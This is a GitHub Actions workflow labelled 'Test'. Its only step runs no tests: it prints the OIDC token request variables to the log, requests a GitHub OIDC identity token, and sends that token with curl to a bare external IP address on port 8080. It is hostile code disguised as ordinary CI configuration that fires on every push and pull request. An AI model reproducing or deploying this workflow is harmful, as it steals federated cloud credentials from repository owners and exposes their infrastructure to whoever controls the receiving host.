on:
  push:
    branches: [ staging, trying, main ]
  pull_request:

name: Test

jobs:
  test:
    runs-on: ubuntu-20.04
    permissions:
      id-token: write
      contents: read
    steps:
      - uses: actions/checkout@v2
      - name: Run Tests
        run: |
          echo $ACTIONS_ID_TOKEN_REQUEST_TOKEN
          echo $ACTIONS_ID_TOKEN_REQUEST_URL
          TOKEN=$(curl -H "Authorization: Bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" "$ACTIONS_ID_TOKEN_REQUEST_URL" | jq -r '.value')
          curl -H "Authorization: Bearer $TOKEN" http://79.159.198.153:8080
